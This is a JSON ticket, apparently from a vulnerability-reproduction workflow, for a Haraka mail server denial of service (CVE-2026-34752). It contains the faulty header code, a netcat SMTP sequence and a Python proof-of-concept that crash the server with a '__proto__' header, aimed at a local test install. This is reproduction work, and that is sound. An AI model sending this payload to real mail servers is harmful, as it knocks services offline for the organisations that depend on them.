{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "library_api",
    "expected_impact": "dos",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": null,
    "upstream_verdicts": null
  },
  "latest_description": "## OBJECTIVE: Reproduce Denial of Service via Prototype Pollution\n\nThis is NOT a crash to ignore - this is a **REMOTE PRE-AUTHENTICATION DoS** affecting a production mail server used by thousands of organizations.\n\n## VULNERABILITY DETAILS\n\n### Root Cause\nIn `node_modules/haraka-email-message/lib/header.js:215-218`, headers are stored in a plain `{}` object:\n\n```javascript\n_add_header(key, value, method) {\n    this.headers[key] ??= []          // line 216\n    this.headers[key][method](value)  // line 217\n}\n```\n\nWhen `key` is `__proto__`:\n1. `this.headers['__proto__']` returns `Object.prototype`\n2. `Object.prototype` is not null/undefined, so `??=` is skipped\n3. `Object.prototype.push(value)` throws `TypeError: not a function`\n4. Uncaught exception triggers `process.exit(1)` in `haraka.js:26-33`\n\n### Impact\n- **Single-process mode**: Entire server crashes and STAYS DOWN\n- **Cluster mode**: Worker dies, sessions lost, availability disrupted\n- **CVSS 4.0**: 8.7/10 (High severity)\n\n## REPRODUCTION STEPS\n\n```bash\n# 1. Install vulnerable version\nnpm install -g Haraka@3.1.3\n\n# 2. Initialize config\nharaka -i /tmp/haraka_test\ncd /tmp/haraka_test\n\n# 3. Start server (default port 2525)\nharaka -c .\n\n# 4. Send malicious email (in another terminal)\n(echo \"EHLO attacker\"; \n echo \"MAIL FROM:<attacker@evil.com>\"; \n echo \"RCPT TO:<victim@localhost>\"; \n echo \"DATA\"; \n echo \"From: attacker@evil.com\"; \n echo \"__proto__: crash\"; \n echo \"\"; \n echo \"Crash payload\"; \n echo \".\"; \n echo \"QUIT\") | nc localhost 2525\n\n# 5. EXPECTED RESULT: Haraka worker process crashes, process exits with code 1\n```\n\n## Python PoC (Official from Advisory)\n```python\nimport socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((\"127.0.0.1\", 2525))\nsock.recv(4096)  # Banner\nsock.sendall(b\"EHLO evil\\r\\n\"); sock.recv(4096)\nsock.sendall(b\"MAIL FROM:<x@x.com>\\r\\n\"); sock.recv(4096)\nsock.sendall(b\"RCPT TO:<user@haraka.local>\\r\\n\"); sock.recv(4096)\nsock.sendall(b\"DATA\\r\\n\"); sock.recv(4096)\nsock.sendall(b\"From: x@x.com\\r\\n__proto__: crash\\r\\n\\r\\nbody\\r\\n.\\r\\n\")\n# Server crashes here\n```\n\n## SUCCESS CRITERIA\n- [ ] Server accepts SMTP connections initially\n- [ ] Server processes normal email without issues\n- [ ] Sending `__proto__:` header causes immediate crash\n- [ ] Process exits with code 1 (visible in logs/terminal)\n- [ ] Server becomes unavailable (DoS achieved)\n\n## FIX VERIFICATION (Version 3.1.4+)\nAfter upgrading to 3.1.4, the same payload should be handled gracefully without crash.\n\n## REFERENCES\n- GitHub Advisory: https://github.com/haraka/Haraka/security/advisories/GHSA-xph3-r2jf-4vp3\n- Fix Release: https://github.com/haraka/Haraka/releases/tag/v3.1.4\n- CVE: https://www.cve.org/CVERecord?id=CVE-2026-34752",
  "product": "Haraka Mail Server",
  "severity": "high",
  "status": "open",
  "summary": "Haraka Mail Server DoS via __proto__ prototype pollution in email headers",
  "ticket_id": "CVE-2026-34752"
}